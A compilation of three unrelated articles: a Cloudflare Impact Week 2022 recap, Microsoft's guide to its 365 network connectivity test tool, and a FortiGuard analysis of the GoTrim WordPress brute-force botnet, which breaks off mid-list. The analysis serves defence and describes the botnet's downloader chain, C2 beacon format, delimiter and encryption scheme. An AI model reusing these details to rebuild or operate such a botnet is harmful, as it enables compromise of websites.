Everything you might have missed during Cloudflare’s Impact Week 2022

And that’s a wrap! Impact Week 2022 has come to a close. Over the last week, Cloudflare announced new commitments in our mission to help build a better Internet, including delivering Zero Trust services for the most vulnerable voices and for critical infrastructure providers. We also announced new products and services, and shared technical deep dives.

Were you able to keep up with everything that was announced? Watch the Impact Week 2022 wrap-up video on Cloudflare TV, or read our recap below for anything you may have missed.

Product announcements

BlogSummary
Cloudflare Zero Trust for Project Galileo and the Athenian ProjectWe are making the Cloudflare One Zero Trust suite available to teams that qualify for Project Galileo or Athenian at no cost. Cloudflare One includes the same Zero Trust security and connectivity solutions used by over 10,000 customers today to connect their users and safeguard their data.
Project Safekeeping – protecting the world’s most vulnerable infrastructure with Zero TrustUnder-resourced organizations that are vital to the basic functioning of our global communities (such as community hospitals, water treatment facilities, and local energy providers) face relentless cyber attacks, threatening basic needs for health, safety and security. Cloudflare’s mission is to help make a better Internet. We will help support these vulnerable infrastructure by providing our enterprise-level Zero Trust cybersecurity solution to them at no cost, with no time limit.
Cloudflare achieves FedRAMP authorization to secure more of the public sectorWe are excited to announce our public sector suite of services, Cloudflare for Government, has achieved FedRAMP Moderate Authorization. The Federal Risk and Authorization Management Program (“FedRAMP”) is a US-government-wide program that provides a standardized approach to security assessment, authorization, and continuous monitoring for cloud products and services.
A new, configurable and scalable version of Geo Key Manager, now available in Closed BetaAt Cloudflare, we want to give our customers tools that allow them to maintain compliance in this ever-changing environment. That’s why we’re excited to announce a new version of Geo Key Manager — one that allows customers to define boundaries by country, by region, or by standard.

Technical deep dives

BlogSummary
Cloudflare is joining the AS112 project to help the Internet deal with misdirected DNS queriesCloudflare is participating in the AS112 project, becoming an operator of the loosely coordinated, distributed sink of the reverse lookup (PTR) queries for RFC 1918 addresses, dynamic DNS updates and other ambiguous addresses.
Measuring BGP RPKI Route Origin ValidationThe Border Gateway Protocol (BGP) is the glue that keeps the entire Internet together. However, despite its vital function, BGP wasn’t originally designed to protect against malicious actors or routing mishaps. It has since been updated to account for this shortcoming with the Resource Public Key Infrastructure (RPKI) framework, but can we declare it to be safe yet?

Customer stories

BlogSummary
Democratizing access to Zero Trust with Project GalileoLearn how organizations under Project Galileo use Cloudflare Zero Trust to protect their organization from cyberattacks.
Securing the inboxes of democracyCloudflare email security worked hard in the 2022 U.S. midterm elections to ensure that the email inboxes of those seeking office were secure.
Expanding Area 1 email security to the Athenian ProjectWe are excited to share that we have grown our offering under the Athenian Project to include Cloudflare’s Area 1 email security suite to help state and local governments protect against a broad spectrum of phishing attacks to keep voter data safe and secure.
How Cloudflare helps protect small businessesLarge-scale cyber attacks on enterprises and governments make the headlines, but the impacts of cyber conflicts can be felt more profoundly and acutely by small businesses that struggle to keep the lights on during normal times. In this blog, we’ll share new research on how small businesses, including those using our free services, have leveraged Cloudflare services to make their businesses more secure and resistant to disruption.

Internet access

BlogSummary
Cloudflare expands Project Pangea to connect and protect (even) more community networksA year and a half ago, Cloudflare launched Project Pangea to help provide Internet services to underserved communities. Today, we’re sharing what we’ve learned by partnering with community networks, and announcing an expansion of the project.
The US government is working on an “Internet for all” plan. We’re on board.The US government has a $65 billion program to get all Americans on the Internet. It’s a great initiative, and we’re on board.
The Montgomery, Alabama Internet Exchange is making the Internet faster. We’re happy to be there.Internet Exchanges are a critical part of a strong Internet. Here’s the story of one of them.
Partnering with civil society to track Internet shutdowns with Radar Alerts and APIWe want to tell you more about how we work with civil society organizations to provide tools to track and document the scope of these disruptions. We want to support their critical work and provide the tools they need so they can demand accountability and condemn the use of shutdowns to silence dissent.
How Cloudflare helps next-generation marketsAt Cloudflare, part of our role is to make sure every person on the planet with an Internet connection has a good experience, whether they’re in a next-generation market or a current-gen market. In this blog we talk about how we define next-generation markets, how we help people in these markets get faster access to the websites and applications they use on a daily basis, and how we make it easy for developers to deploy services geographically close to users in next-generation markets.

Sustainability

BlogSummary
Independent report shows: moving to Cloudflare can cut your carbon footprintWe didn’t start out with the goal to reduce the Internet’s environmental impact. But as the Internet has become an ever larger part of our lives, that has changed. Our mission is to help build a better Internet — and a better Internet needs to be a sustainable one.
A more sustainable end-of-life for your legacy hardware appliances with Cloudflare and Iron MountainWe’re excited to announce an opportunity for Cloudflare customers to make it easier to decommission and dispose of their used hardware appliances in a sustainable way. We’re partnering with Iron Mountain to offer preferred pricing and value-back for Cloudflare customers that recycle or remarket legacy hardware through their service.
How we’re making Cloudflare’s infrastructure more sustainableWith the incredible growth of the Internet, and the increased usage of Cloudflare’s network, even linear improvements to sustainability in our hardware today will result in exponential gains in the future. We want to use this post to outline how we think about the sustainability impact of the hardware in our network, and what we’re doing to continually mitigate that impact.
Historical emissions offsets (and Scope 3 sneak preview)Last year, Cloudflare committed to removing or offsetting the historical emissions associated with powering our network by 2025. We are excited to announce our first step toward offsetting our historical emissions by investing in 6,060 MTs’ worth of reforestation carbon offsets as part of the Pacajai Reduction of Emissions from Deforestation and forest Degradation (REDD+) Project in the State of Para, Brazil.
How we redesigned our offices to be more sustainableCloudflare is working hard to ensure that we’re making a positive impact on the environment around us, with the goal of building the most sustainable network. At the same time, we want to make sure that the positive changes that we are making are also something that our local Cloudflare team members can touch and feel, and know that in each of our actions we are having a positive impact on the environment around us. This is why we make sustainability one of the underlying goals of the design, construction, and operations of our global office spaces.
More bots, more treesOnce a year, we pull data from our Bot Fight Mode to determine the number of trees we can donate to our partners at One Tree Planted. It’s part of the commitment we made in 2019 to deter malicious bots online by redirecting them to a challenge page that requires them to perform computationally intensive, but meaningless tasks. While we use these tasks to drive up the bill for bot operators, we account for the carbon cost by planting trees.

Policy

BlogSummary
The Challenges of Sanctioning the InternetAs governments continue to use sanctions as a foreign policy tool, we think it’s important that policymakers continue to hear from Internet infrastructure companies about how the legal framework is impacting their ability to support a global Internet. Here are some of the key issues we’ve identified and ways that regulators can help balance the policy goals of sanctions with the need to support the free flow of communications for ordinary citizens around the world.
An Update on Cloudflare’s Assistance to UkraineOn February 24, 2022, when Russia invaded Ukraine, Cloudflare jumped into action to provide services that could help prevent potentially destructive cyber attacks and keep the global Internet flowing. During Impact Week, we want to provide an update on where things currently stand, the role of security companies like Cloudflare, and some of our takeaways from the conflict so far.
Two months later: Internet use in Iran during the Mahsa Amini ProtestsA series of protests began in Iran on September 16, following the death in custody of Mahsa Amini — a 22 year old who had been arrested for violating Iran’s mandatory hijab law. The protests and civil unrest have continued to this day. But the impact hasn’t just been on the ground in Iran — the impact of the civil unrest can be seen in Internet usage inside the country, as well.
How Cloudflare advocates for a better InternetWe thought this week would be a great opportunity to share Cloudflare’s principles and our theories behind policy engagement. Because at its core, a public policy approach needs to reflect who the company is through their actions and rhetoric. And as a company, we believe there is real value in helping governments understand how companies work, and helping our employees understand how governments and law-makers work.
Applying Human Rights Frameworks to our approach to abuseWhat does it mean to apply human rights frameworks to our response to abuse? As we’ll talk about in more detail, we use human rights concepts like access to fair process, proportionality (the idea that actions should be carefully calibrated to minimize any effect on rights), and transparency.
The Unintended Consequences of blocking IP addressesThis blog dives into a discussion of IP blocking: why we see it, what it is, what it does, who it affects, and why it’s such a problematic way to address content online.

Impact

BlogSummary
Closing out 2022 with our latest Impact ReportOur Impact Report is an annual summary highlighting how we are trying to build a better Internet and the progress we are making on our environmental, social, and governance priorities.
Working to help the HBCU Smart Cities ChallengeThe HBCU Smart Cities Challenge invites all HBCUs across the United States to build technological solutions to solve real-world problems.
Introducing Cloudflare’s Third Party Code of ConductCloudflare is on a mission to help build a better Internet, and we are committed to doing this with ethics and integrity in everything that we do. This commitment extends beyond our own actions, to third parties acting on our behalf. We are excited to share our Third Party Code of Conduct, specifically formulated with our suppliers, resellers and other partners in mind.
The latest from Cloudflare’s seventeen Employee Resource GroupsIn this blog post, we highlight a few stories from some of our 17 Employee Resource Groups (ERGs), including the most recent, Persianflare.

What’s next?

That’s it for Impact Week 2022. But let’s keep the conversation going. We want to hear from you!

Visit the Cloudflare Community to share your thoughts about Impact Week 2022, or engage with our team on FacebookTwitterLinkedIn, and YouTube.

Or if you’d like to rewatch any Cloudflare TV segments associated with the above stories, visit the Impact Week hub on our website.

Watch on Cloudflare TV

We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet applicationward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/everything-you-might-have-missed-during-cloudflares-impact-week-2022/

Microsoft 365 network connectivity test tool

The Microsoft 365 network connectivity test tool is located at https://connectivity.office.com. It’s an adjunct tool to the network assessment and network insights available in the Microsoft 365 admin center under the Health | Connectivity menu.

 Important

It’s important to sign in to your Microsoft 365 tenant as all test reports are shared with your administrator and uploaded to the tenant while you are signed in.

Connectivity test tool.

 Note

The network connectivity test tool supports tenants in WW Commercial but not GCC Moderate, GCC High, DoD or China.

Network insights in the Microsoft 365 Admin Center are based on regular in-product measurements for your Microsoft 365 tenant, aggregated each day. In comparison, network insights from the Microsoft 365 network connectivity test are run locally in the tool.

In-product testing is limited, and running tests local to the user collects more data resulting in deeper insights. Network insights in the Microsoft 365 Admin Center will show that there’s a networking problem at a specific office location. The Microsoft 365 connectivity test can help to identify the root cause of that problem and provide a targeted performance improvement action.

We recommend that these insights be used together where networking quality status can be assessed for each office location in the Microsoft 365 Admin Center and more specifics can be found after deployment of testing based on the Microsoft 365 connectivity test.

What happens at each test step

Office location identification

When you click the Run test button, we show the running test page and identify the office location. You can type in your location by city, state, and country or choose to have it detected for you. If you detect the office location, the tool requests the latitude and longitude from the web browser and limits the accuracy to 300 meters by 300 meters before use. It’s not necessary to identify the location more accurately than the building to measure network performance.

JavaScript tests

After office location identification, we run a TCP latency test in JavaScript and we request data from the service about in-use and recommended Microsoft 365 service front door servers. When these tests are completed, we show them on the map and in the details tab where they can be viewed before the next step.

Download the advanced tests client application

Next, we start the download of the advanced tests client application. We rely on the user to launch the client application and they must also have .NET 6.0 Runtime installed.

There are two parts to the Microsoft 365 network connectivity test: the web site https://connectivity.office.com and a downloadable Windows client application that runs advanced network connectivity tests. Most of the tests require the application to be run. It will populate results back into the web page as it runs.

You’ll be prompted to download the advanced client test application from the web site after the web browser tests have completed. Open and run the file when prompted.

Advanced tests client application.

Start the advanced tests client application

Once the client application starts, the web page will update to show this result. Test data will start to be received to the web page. The page updates each time new-data is received and you can review the data as it arrives.

Advanced tests completed and test report upload

When the tests are completed, the web page and the advanced tests client will both show that. If the user is signed in, the test report will be uploaded to the customer’s tenant.

Sharing your test report

The test report requires authentication to your Microsoft 365 account. Your administrator selects how you can share your test report. The default settings allow for sharing of your reports with other user within your organization and the ReportID link is not available. Reports will expire by default after 90 days.

Sharing your report with your administrator

If you’re signed in when a test report occurs, the report is shared with your administrator.

Sharing with your Microsoft account team, support or other personnel

Test reports (excluding any personal identification) are shared with Microsoft employees. This sharing is enabled by default and can be disabled by your administrator in the Health | Network Connectivity page in the Microsoft 365 Admin Center.

Sharing with other users who sign in to the same Microsoft 365 tenant

You can choose users to share your report with. Being able to choose is enabled by default, but it can be disabled by your administrator.

Sharing a link to your test results with a user.

You can share your test report with anyone by providing access to a ReportID link. This link generates a URL that you can send to someone so that they can bring up the test report without signing in. This sharing is disabled by default and must be enabled by your administrator.

Sharing a link to your test results.

Network Connectivity Test Results

The results are shown in the Summary and Details tabs. The summary tab shows a map of the detected network perimeter and a comparison of the network assessment to other Microsoft 365 customers nearby. It also allows for sharing of the test report. Here’s what the summary results view looks like:

Network connectivity test tool summary results.

Here’s an example of the details tab output. On the details tab we show a green circle check mark if the result was compared favorably. We show a red triangle exclamation point if the result exceeded a threshold indicating a network insight. The following sections describe each of the details tab results rows and explain the thresholds used for network insights.

Network connectivity test tool example test results.

Your location information

This section shows test results related to your location.

Your location

The user location is detected from the users web browser. It can also be typed in at the user’s choice. It’s used to identify network distances to specific parts of the enterprise network perimeter. Only the city from this location detection and the distance to other network points are saved in the report.

The user office location is shown on the map view.

Network egress location (the location where your network connects to your ISP)

We identify the network egress IP address on the server side. Location databases are used to look up the approximate location for the network egress. These databases typically have an accuracy of about 90% of IP addresses. If the location looked up from the network egress IP address isn’t accurate, this would lead to a false result. To validate if this error is occurring for a specific IP address, you can use publicly accessible network IP address location web sites to compare against your actual location.

Your distance from the network egress location

We determine the distance from that location to the office location. This is shown as a network insight if the distance is greater than 500 miles (800 kilometers) since that is likely to increase the TCP latency by more than 25 ms and may affect user experience.

The map shows the network egress location in relation to the user office location indicating the network backhaul inside of the enterprise WAN.

Implement local and direct network egress from user office locations to the Internet for optimal Microsoft 365 network connectivity. Improvements to local and direct egress are the best way to address this network insight.

Proxy server information

We identify whether proxy server(s) are configured on the local machine to pass Microsoft 365 network traffic in the Optimize category. We identify the distance from the user office location to the proxy servers.

The distance is tested first by ICMP ping. If that fails, we test with TCP ping and finally we look up the proxy server IP address in an IP address location database. We show a network insight if the proxy server is further than 500 miles (800 kilometers) away from the user office location.

Virtual private network (VPN) you use to connect to your organization

This test detects if you’re using a VPN to connect to Microsoft 365. A passing result will show if you have no VPN, or if you have a VPN with recommended split tunnel configuration for Microsoft 365.

VPN Split Tunnel

Each Optimize category route for Exchange Online, SharePoint Online, and Microsoft Teams is tested to see if It’s tunneled on the VPN. A split out workload avoids the VPN entirely. A tunneled workload is sent over the VPN. A selective tunneled workload has some routes sent over the VPN and some split out. A passing result will show if all workloads are split out or selective tunneled.

Customers in your metropolitan area with better performance

Network latency between the user office location and the Exchange Online service is compared to other Microsoft 365 customers in the same metro area. A network insight is shown if 10% or more of customers in the same metro area have better performance. This means their users will have better performance in the Microsoft 365 user interface.

This network insight is generated on the basis that all users in a city have access to the same telecommunications infrastructure and the same proximity to Internet circuits and Microsoft’s network.

Time to make a DNS request on your network

This shows the DNS server configured on the client machine that ran the tests. It might be a DNS Recursive Resolver server however this is uncommon. It’s more likely to be a DNS forwarder server, which caches DNS results and forwards any uncached DNS requests to another DNS server.

This is provided for information only and does not contribute to any network insight.

Your distance from and/or time to connect to a DNS recursive resolver

The in-use DNS Recursive Resolver is identified by making a specific DNS request and then asking the DNS Name Server for the IP Address that it received the same request from. This IP Address is the DNS Recursive Resolver and it will be looked up in IP Address location databases to find the location. The distance from the user office location to the DNS Recursive Resolver server location is then calculated. This is shown as a network insight if the distance is greater than 500 miles (800 kilometers).

The location looked up from the network egress IP Address may not be accurate and this would lead to a false result from this test. To validate if this error is occurring for a specific IP Address, you can use publicly accessible network IP Address location web sites.

This network insight will specifically impact the selection of the Exchange Online service front door. To address this insight local and direct network egress should be a pre-requisite and then DNS Recursive Resolver should be located close to that network egress.

Exchange Online

This section shows test results related to Exchange Online.

Exchange service front door location

The in-use Exchange service front door is identified in the same way that Outlook does this and we measure the network TCP latency from the user location to it. The TCP latency is shown and the in-use Exchange service front door is compared to the list of best service front doors for the current location. This is shown as a network insight if one of the best Exchange service front door(s) isn’t in use.

Not using one of the best Exchange service front door(s) could be caused by network backhaul before the corporate network egress in which case we recommend local and direct network egress. It could also be caused by use of a remote DNS recursive resolver server in which case we recommend aligning the DNS recursive resolver server with the network egress.

We calculate a potential improvement in TCP latency (ms) to the Exchange service front door. This is done by looking at the tested user office location network latency and subtracting the network latency from the current location to the closets Exchange service front door. The difference represents the potential opportunity for improvement.

Best Exchange service front door(s) for your location

This lists the best Exchange service front door locations by city for your location.

Service front door recorded in the client DNS

This shows the DNS name and IP Address of the Exchange service front door server that you were directed to. It’s provided for information only and there’s no associated network insight.

SharePoint Online

This section shows test results related to SharePoint Online and OneDrive.

The service front door location

The in-use SharePoint service front door is identified in the same way that the OneDrive client does and we measure the network TCP latency from the user office location to it.

Download speed

We measure the download speed for a 15 Mb file from the SharePoint service front door. The result is shown in megabytes per second to indicate what size file in megabytes can be downloaded from SharePoint or OneDrive in one second. The number should be similar to one tenth of the minimum circuit bandwidth in megabits per second. For example if you have a 100mbps internet connection, you may expect 10 megabytes per second (10 MBps).

Buffer bloat

During the 15Mb download we measure the TCP latency to the SharePoint service front door. This is the latency under load and it’s compared to the latency when not under load. The increase in latency when under load is often attributable to consumer network device buffers being loaded (or bloated). A network insight is shown for any bloat of 100ms or more.

Service front door recorded in the client DNS

This shows the DNS name and IP Address of the SharePoint service front door server that you were directed to. It’s provided for information only and there’s no associated network insight.

Microsoft Teams

This section shows test results related to Microsoft Teams.

Media connectivity (audio, video, and application sharing)

This tests for UDP connectivity to the Microsoft Teams service front door. If this is blocked, then Microsoft Teams may still work using TCP, but audio and video will be impaired. Read more about these UDP network measurements, which also apply to Microsoft Teams at Media Quality and Network Connectivity Performance in Skype for Business Online.

Packet loss

Shows the UDP packet loss measured in a 10-second test audio call from the client to the Microsoft Teams service front door. This should be lower than 1.00% for a pass.

Latency

Shows the measured UDP latency, which should be lower than 100ms.

Jitter

Shows the measured UDP jitter, which should be lower than 30ms.

Connectivity

We test for HTTP connectivity from the user office location to all of the required Microsoft 365 network endpoints. These are published at https://aka.ms/o365ip. A network insight is shown for any required network endpoints, which cannot be connected to.

Connectivity may be blocked by a proxy server, a firewall, or another network security device on the enterprise network perimeter. Connectivity to TCP port 80 is tested with an HTTP request and connectivity to TCP port 443 is tested with an HTTPS request. If there’s no response the FQDN is marked as a failure. If there’s an HTTP response code 407 the FQDN is marked as a failure. If there’s an HTTP response code 403 then we check the Server attribute of the response and if it appears to be a proxy server we mark this as a failure. You can simulate the tests we perform with the Windows command-line tool curl.exe.

We test the SSL certificate at each required Microsoft 365 network endpoint that is in the optimize or allow category as defined at https://aka.ms/o365ip. If any tests do not find a Microsoft SSL certificate, then the encrypted network connected must have been intercepted by an intermediary network device. A network insight is shown on any intercepted encrypted network endpoints.

Where an SSL certificate is found that isn’t provided by Microsoft, we show the FQDN for the test and the in-use SSL certificate owner. This SSL certificate owner may be a proxy server vendor, or it may be an enterprise self-signed certificate.

Network path

This section shows the results of an ICMP traceroute to the Exchange Online service front door, the SharePoint Online service front door, and the Microsoft Teams service front door. It’s provided for information only and there’s no associated network insight. There are three traceroutes provided. A traceroute to outlook.office365.com, a traceroute to the customers SharePoint front end or to microsoft.sharepoint.com if one was not provided, and a traceroute to world.tr.teams.microsoft.com.

Connectivity reports

When you are signed in you can review previous reports that you have run. You can also share them or delete them from the list.

Reports.

Network health status

This shows any significant health issues with Microsoft’s global network, which might impact Microsoft 365 customers.

Network health status.

Testing from the Command Line

We provide a command line executable that can be used by your remote deployment and execution tools and run the same tests as are available in the Microsoft 365 network connectivity test tool web site.

The command line test tool can be downloaded here: Command Line Tool

You can run it by double clicking the executable in Windows File Explorer, or you can start it from a command prompt, or you can schedule it with task scheduler.

The first time you launch the executable you will be prompted to accept the end user license agreement (EULA) before testing is performed. If you have already read and accepted the EULA you can create an empty file called Microsoft-365-Network-Connectivity-Test-EULA-accepted.txt in the current working directory for the executable process when it is launched. To accept the EULA you can type ‘y’ and press enter in the command line window when prompted.

The executable accepts the following command line parameters:

  • -h to show a link to this help documentation
  • -testlist <test> Specifies tests to run. By default only basic tests are run. Valid test names include: all, dnsConnectivityPerf, dnsResolverIdentification, bufferBloat, traceroute, proxy, vpn, skype, connectivity, networkInterface
  • -filepath <filedir> Directory path of test result files. Allowed value is absolute or relative path of an accessible directory
  • -city <city> For the city, state, and country fields the specified value will be used if provided. If not provided then Windows Location Services (WLS) will be queried. If WLS fails the location will be detected fromthe machines network egress
  • -state <state>
  • -country <country>
  • -proxy <account> <password> Proxy account name and password can be provided if you require a proxy to access the Internet

Results

Output of results are written to a JSON file in a folder called TestResults which is created in the current working directory of the process unless it already exists. The filename format for the output is connectivity_test_result_YYYY-MM-DD-HH-MM-SS.json. The results are in JSON nodes that match the output shown on the web page for the Microsoft 365 network connectivity test tool web site. A new result file is created each time you run it and the standalone executable does not upload results to your Microsoft tenant for viewing in the Admin Center Network Connectivity pages. Front door codes, longitudes, and latitudes are not included in the result file.

Launching from Windows File Explorer

You can simply double click on the executable to start the testing and a command prompt window will appear.

Launching from the Command Prompt

On a CMD.EXE command prompt window you can type the path and name of the executable to run it. The filename is Microsoft.Connectivity.Test.exe

Launching from Windows Task Scheduler

In Windows Task Scheduler you can add a task to launch the standalone test executable. You should specify the current working directory of the task to be where you have created the EULA accepted file since the executable will block until the EULA is accepted. You cannot interactively accept the EULA if the process is started in the background with no console.

More details on the standalone executable

The commandline tool uses Windows Location Services to find the users City State Country information for determining some distances. If Windows Location Services is disabled in the control panel then user location based assessments will be blank. In Windows Settings “Location services” must be on and “Let desktop apps access your location” must also be on.

The commandline tool will attempt to install the .NET Framework if it is not already installed. It will also download the main testing executable from the Microsoft 365 network connectivity test tool and launch that.

Test using the Microsoft Support and Recovery Assistant

Microsoft Support and Recovery Assistant (Assistant) automates all the steps required to execute the command-line version of the Microsoft 365 network connectivity test tool on a user’s machine and creates a report similar to the one created by the web version of the connectivity test tool. Note, the Assistant runs the command line version of Microsoft 365 network connectivity test tool to produce the same JSON result file, but the JSON file is converted into .CSV file format.

Download and Run the Assistant Here

Viewing Test Results

Reports can be accessed in the following ways:

The reports will be available on the below screen once the Assistant has finished scanning the user’s machine. To access these reports, simply click on the “View log” option to view them.

Microsoft Support and Recovery Assistant wizard.

Connectivity test results and Telemetry data are collected and uploaded to the uploadlogs folder. To access this folder, use one of the following methods:

  • Open Run (Windows logo key + R), and run the %localappdata%/saralogs/uploadlogs command as follows:
Run dialog for locating output.
  • In File Explorer, type C:\Users<UserName>\AppData\Local\saralogs\uploadlogs and press Enter as follows:
Windows Explorer Address Bar for output.

Note: <UserName> is the user’s Windows profile name. To view the information about the test results and telemetry, double-click and open the files.

Windows Explorer SARA Output Files.

Types of result files

Microsoft Support and Recovery Assistant creates 2 files:

  1. Network Connectivity Report (CSV) This report runs the raw JSON file against a rule engine to make sure defined thresholds are being met and if they are not met a “warning” or “error” is displayed in the output column of the CSV file. You can view the NetworkConnectivityReport.csv file to be informed about any detected issues or defects. Please see What happens at each test step for details on each test and the thresholds for warnings.
  2. Network Connectivity Scan Report (JSON) This file provides the raw output test results from the command-line version of the Microsoft 365 network connectivity test tool (MicrosoftConnectivityTest.exe).

FAQ

Here are answers to some of our frequently asked questions.

What is required to run the advanced test client?

The advanced test client requires .NET 6.0 Runtime. If you run the advanced test client without that installed you will be directed to the .NET 6.0 installer page. Be sure to install from the Run desktop apps column for Windows. Administrator permissions on the machine are required to install .NET 6.0 Runtime.

The advanced test client uses SignalR to communicate to the web page. For this you must ensure that TCP port 443 connectivity to connectivity.service.signalr.net is open. This URL isn’t published in the https://aka.ms/o365ip because that connectivity isn’t required for a Microsoft 365 client application user.

What is Microsoft 365 service front door?

The Microsoft 365 service front door is an entry point on Microsoft’s global network where Office clients and services terminate their network connection. For an optimal network connection to Microsoft 365, It’s recommended that your network connection is terminated into the closest Microsoft 365 front door in your city or metro.

 Note

Microsoft 365 service front door has no direct relationship to the Azure Front Door Service product available in the Azure marketplace.

What is the best Microsoft 365 service front door?

A best Microsoft 365 service front door (formerly known as an optimal service front door) is one that is closest to your network egress, generally in your city or metro area. Use the Microsoft 365 network performance tool to determine location of your in-use Microsoft 365 service front door and the best service front door(s). If the tool determines your in-use front door is one of the best ones, then you should expect great connectivity into Microsoft’s global network.

What is an internet egress location?

The internet egress Location is the location where your network traffic exits your enterprise network and connects to the Internet. This is also identified as the location where you have a Network Address Translation (NAT) device and usually where you connect with an Internet Service Provider (ISP). If you see a long distance between your location and your internet egress location, then this may identify a significant WAN backhaul.

Network connectivity in the Microsoft 365 Admin Center

Microsoft 365 network performance insights

Microsoft 365 network assessment

Microsoft 365 Network Connectivity Location Services

Source :
https://learn.microsoft.com/en-us/Microsoft-365/Enterprise/office-365-network-mac-perf-onboarding-tool?view=o365-worldwide

GoTrim: Go-based Botnet Actively Brute Forces WordPress Websites

FortiGuard Labs recently encountered a previously unreported Content Management System (CMS) scanner and brute forcer written in the Go programming language (also commonly referred to as Golang). We took a closer look at this malware because it was being described in several online forums as being installed in compromised WordPress sites, but there were no publicly available analysis reports.

  • Affected Platforms: Linux
  • Impacted Users: Any organization
  • Impact: Remote attackers gain control of the vulnerable systems
  • Severity Level: Critical

Golang brute forcers are not new. For example, we previously reported on the StealthWorker campaign in 2019. This new brute forcer is part of a new campaign we have named GoTrim because it was written in Go and uses “:::trim:::” to split data communicated to and from the C2 server.

Similar to StealthWorker, GoTrim also utilizes a bot network to perform distributed brute force attacks. The earliest sample we found was from Sep 2022. That campaign is still ongoing at the time of writing.   

This article details how this active botnet scans and compromises websites using WordPress and OpenCart. We also highlight some differences between samples collected from Sep to Nov 2022 at the end of the article.

Attack Chain

Screenshot of Figure 1: GoTrim attack chainFigure 1: GoTrim attack chain

GoTrim uses a bot network to perform distributed brute force attacks against its targets. Each bot is given a set of credentials to use to attempt to log into a long list of website targets. After a successful login, a bot client is installed into the newly compromised system. It then awaits further commands from the threat actors, thereby expanding the bot network.

GoTrim only reports credentials to the C2 server after a successful brute force attempt. We did not observe any code in GoTrim for propagating itself or deploying other malware. However, we did find PHP scripts that download and execute GoTrim bot clients. It seems likely that the threat actor is somehow abusing compromised credentials to deploy PHP scripts to infect systems with GoTrim.

Screenshot of Figure 2: PHP downloader scriptFigure 2: PHP downloader script

Typically, each script downloads the GoTrim malware from a hardcoded URL to a file in the same directory as the script itself and executes it. To cover its tracks, both the downloader script and GoTrim brute forcer are deleted from the infected system. It does not maintain persistence in the infected system.

Static Analysis

Analysis detailed in this article is based on a sample with SHA-256 hash c33e50c3be111c1401037cb42a0596a123347d5700cee8c42b2bd30cdf6b3be3, unless stated otherwise.

GoTrim is built with Go version 1.18. As with all Go applications, all third-party libraries used in the code are statically linked to the malware, resulting in a relatively bigger file size for the executable binary. But this has the advantage of not depending on any external files to execute correctly. To solve the size issue, the malware is packed using UPX to reduce the file from 6 MB to 1.9 MB.

Another advantage of using Go is that the same source code can be cross-compiled to support different architectures and Operating Systems. Based on the source code paths in the samples, Windows was used during the development of GoTrim. However, we have only observed samples targeting 64-bit Linux in the wild.

C2 Communication

GoTrim can communicate with its Command and Control (C2) server in two ways: a client mode, where it sends HTTP POST requests to the Command and Control (C2 server), or a server mode, where it starts an HTTP server to listen for incoming POST requests. All data exchanged with the C2 is encrypted using the Advanced Encryption Standard in Galois Counter Mode (AES-GCM) with a key derived from a passphrase embedded in the malware binary.

By default, GoTrim attempts to run in server mode if the infected malware is directly connected to the Internet—that is, if the victim’s outbound or local IP address is non-private. Otherwise, it switches to client mode.

Upon execution, GoTrim creates an MD5 hash representing a unique identification for the infected machine (bot ID). This is generated from the following string containing several pieces of information delimited by the “:” character:

VICTIM_EXTERNAL_IP:HTTP_SERVER_PORT:1:OUTBOUND_IP:AES_PASSPHRASE

  • VICTIM_EXTERNAL_IP: External/public IP of the machine
  • HTTP_SERVER_PORT: HTTP server port. This is a randomly generated number between 4000 to 8000 for the HTTP server in server mode. It is always 0 for client mode.
  • Malware initialization flag: Always set to 1 by the time the bot ID is being calculated
  • OUTBOUND_IP: Outbound/local IP address of the victim machine.
  • AES_PASSPHRASE: Hardcoded string embedded into each sample. This malware later uses the SHA256 hash of this string as the AES-GCM key for encrypting its communication with the C2 server. The same AES passphrase is shared among all samples we observed.

After generating the bot ID, GoTrim creates an asynchronous Go routine (similar to multithreading) that sends a beacon request to the C2 server on both client and server modes.

The C2 request URLs change between versions, as discussed in a later section of this article. For this particular sample, the beacon request URL is “/selects?dram=1”.

In this beacon request, several pieces of victim and bot information are sent to the C2 server, as seen in Figure 3.

Screenshot of Figure 3: Screenshot of data sent to the C2 serverFigure 3: Screenshot of data sent to the C2 server

Some of the interesting fields sent in the beacon request include the following:

1. Bot ID: unique ID for the bot
2. External IP: public IP address of the victim machine
3. HTTP Server Port: randomly generated port for the HTTP server (0 in client mode)
4. Malware Initialization Flag: always set to 1 by the time this request is made
5. Outbound IP: local IP address of the victim machine
6. Status Message: The “GOOD” message is replaced by other strings that report the status of any running CMS detection or brute forcing tasks during subsequent beacon requests.
7. Status Flags: These indicate whether the malware currently has any processing tasks assigned by the C2 server and the IDs of these tasks
8. MD5 Checksum: This value is generated from parts of the above request and the hardcoded AES passphrase. It serves as a message integrity checksum.

The fields are joined together with the :::trim:::string, hence the name chosen for this campaign. The data is then encrypted using an AES-256-GCM key, the SHA-256 hash of the previously mentioned passphrase.

The server usually responds with “OK”, “404 page not found”, or “BC”, all encrypted with the same AES-GCM key. When “BC” is received, GoTrim will regenerate its bot ID and switch from server to client mode.

The first beacon request is to register a new bot (victim) to the bot network.

After each beacon request, GoTrim sleeps between a few seconds to several minutes, depending on the C2 server response and whether the malware is currently working on C2-assigned tasks before sending the next request. The malware regularly performs this beacon request to update the C2 server about the bot’s status, including successful credentials, as discussed in the brute forcing section of the article. If GoTrim fails to receive a valid response from the C2 server after 100 retries, it will terminate itself.

While the beacon requests are being sent asynchronously to update the C2 server on its status, GoTrim either sends a request to the C2 server to receive commands (client mode) or sets up an HTTP server to listen for incoming tasking requests (server mode).

Client Mode

In client mode, the malware sends a POST request to “/selects?bilert=1” to receive commands from the C2 server.

The C2 server responds with the command encrypted with the same AES-GCM key. An example of a decrypted command can be seen below in Figure 4.

Screenshot of Figure 4: Screenshot of the response containing the command and its optionsFigure 4: Screenshot of the response containing the command and its options

After splitting the data by the “:::trim:::” string, seven fields can be identified, as listed below.

1. MD5 Checksum: used for checking message integrity, e.g., 83217f8b39dccc2f9f2a0157f0236c4f
2. Command ID: This indicates the command for the current task
3. Concurrency Level: This affects how many goroutines are executed for each task
4. Command Options: This contains options for the commands, separated by 7E 6A 71 6D 70 C2 A9 (~jqmp©) bytes. They are interpreted differently depending on the command:

